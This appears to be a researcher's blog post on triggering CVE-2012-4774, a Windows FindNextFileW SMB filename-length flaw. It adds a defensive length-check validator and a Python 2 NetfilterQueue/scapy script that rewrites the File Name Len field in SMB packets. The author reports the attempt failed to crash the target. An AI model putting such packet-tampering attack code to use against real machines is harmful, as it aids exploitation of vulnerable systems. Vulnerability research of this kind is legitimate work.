Wanted to get CVE-2012-4774 to crash so I could carry on debugging the crash, but the damn thing just wouldn't crash.
Had a look at http://www.mcafee.com/us/resources/release-notes/foundstone/fsl_12_12_2012.pdf
McAfee says of CVE-2012-4774:
The flaw lies in the parsing of file names. Successful exploitation could allow an attacker to execute remote code. The exploit
requires the user to browse a file system containing malicious files.
Diffing the patch, the problem is in FindNextFileW.
The patched code adds a mov eax,206h and checks the SMB File Name Len field against it, so I have a rough idea of what's going on.
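The length check the post attributes to the patch (the comparison against 206h), written out as a standalone validator so the two failure modes are visible: a server that claims a File Name Len larger than the bytes it actually sent, and a server that truthfully sends a name longer than the fixed 260-WCHAR cFileName buffer can hold. This is an added example in Python 3, not code from the post and not Windows' own implementation; the entry layout it parses (8 dummy header bytes, a 4-byte little-endian File Name Len, then the UTF-16LE name) is a constructed simplification, and the 0x258 value in the demo mirrors the length the post's packet-rewriting code writes.

```python
import struct

# Bound the post says the patched FindNextFileW enforces on the SMB File Name
# Len field (mov eax, 206h). 0x206 bytes = 259 UTF-16 code units, i.e. what
# fits in a MAX_PATH (260 WCHAR) cFileName buffer with a terminating NUL.
MAX_FILE_NAME_LEN = 0x206


def check_file_name_len(entry, name_len_offset):
    """Validate one directory entry before its name would be copied into a
    fixed-size buffer.

    entry           -- raw directory-information entry (constructed layout)
    name_len_offset -- offset of the 4-byte little-endian File Name Len field;
                       the name itself is assumed to follow the field directly
    Returns (ok, decoded_name_or_reason).
    """
    if name_len_offset + 4 > len(entry):
        return False, "entry too short to hold a File Name Len field"
    (name_len,) = struct.unpack_from("<I", entry, name_len_offset)
    name_start = name_len_offset + 4
    # Check 1: the claimed name must actually lie inside the bytes received.
    # A rewritten field (0x258 in a 408-byte packet, as in the post) fails here.
    if name_start + name_len > len(entry):
        return False, "File Name Len 0x%x exceeds entry (%d bytes left)" % (
            name_len, len(entry) - name_start)
    # Check 2: the bound the patch adds; a truthful but over-long name fails here.
    if name_len > MAX_FILE_NAME_LEN:
        return False, "File Name Len 0x%x > 0x%x" % (name_len, MAX_FILE_NAME_LEN)
    # Check 3: UTF-16 names always have an even byte length.
    if name_len % 2:
        return False, "odd File Name Len for a UTF-16 name"
    return True, entry[name_start:name_start + name_len].decode("utf-16-le")


def make_entry(name, claimed_len=None):
    """Build a constructed entry: 8 dummy header bytes, the length field, then
    the UTF-16LE name. claimed_len lets a caller lie about the length the way
    a hostile server (or an on-path rewrite) would."""
    encoded = name.encode("utf-16-le")
    length = len(encoded) if claimed_len is None else claimed_len
    return b"\x00" * 8 + struct.pack("<I", length) + encoded


if __name__ == "__main__":
    cases = [
        ("honest short name", make_entry("123")),
        ("length rewritten to 0x258", make_entry("123", 0x258)),
        ("honest 300-char name", make_entry("A" * 300)),
        ("odd length", make_entry("ab", 3)),
    ]
    for label, entry in cases:
        print("%-28s -> %r" % (label, check_file_name_len(entry, 8)))
```

The order of the checks matters: the consistency check against the received byte count comes first so that a lying length field never drives a read past the buffer, and only then is the fixed upper bound applied to what is really there.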
Tried writing some packet-modification attack code for this vulnerability (there is a file named 123 in the samba share directory):
```python
'''
Python 2 script. Add this iptables rule first so matching packets are
handed to NFQUEUE number 1:
    iptables -I OUTPUT -d 192.168.0.0/24 -j NFQUEUE --queue-num 1
'''
from netfilterqueue import NetfilterQueue
from scapy.all import *

# 256-entry translation table for the ASCII column of the hexdump:
# printable ASCII (except backslash) is kept, everything else becomes '.'
__vis_filter = ''.join(chr(c) if 0x20 <= c < 0x7f and c != 0x5c else '.'
                       for c in range(256))


def hexdump(buf, length=16):
    """Return a hexdump output string of the given buffer."""
    n = 0
    res = []
    while buf:
        line, buf = buf[:length], buf[length:]
        hexa = ' '.join(['%02x' % ord(x) for x in line])
        line = line.translate(__vis_filter)
        res.append('  %04d:  %-*s %s' % (n, length * 3, hexa, line))
        n += length
    return '\n'.join(res)


def print_and_accept(pkt):
    """Debug helper: dump a queued packet and let it through unchanged."""
    data = hexdump(pkt.get_payload())
    print data
    pkt.accept()


def process(payload):
    data = payload.get_payload()
    # Pick out the 408-byte packet of interest, then overwrite the 4 bytes
    # 40 from the end (taken to be the File Name Len field) with 0x258.
    if data.find('\x06\x00\x00\x00') != -1 and len(data) == 408:
        data2 = data[:-40] + '\x58\x02\x00\x00' + data[-36:]
        pkt = IP(data2)
        print hexdump(str(pkt))
        send(pkt, verbose=0)
        payload.drop()
    else:
        payload.accept()


def main():
    nfqueue = NetfilterQueue()
    nfqueue.bind(1, process)
    try:
        nfqueue.run()
    except KeyboardInterrupt:
        print "now exit"


if __name__ == "__main__":
    main()
```
Result: a tragedy, couldn't get it to crash. Sigh, keep exploring.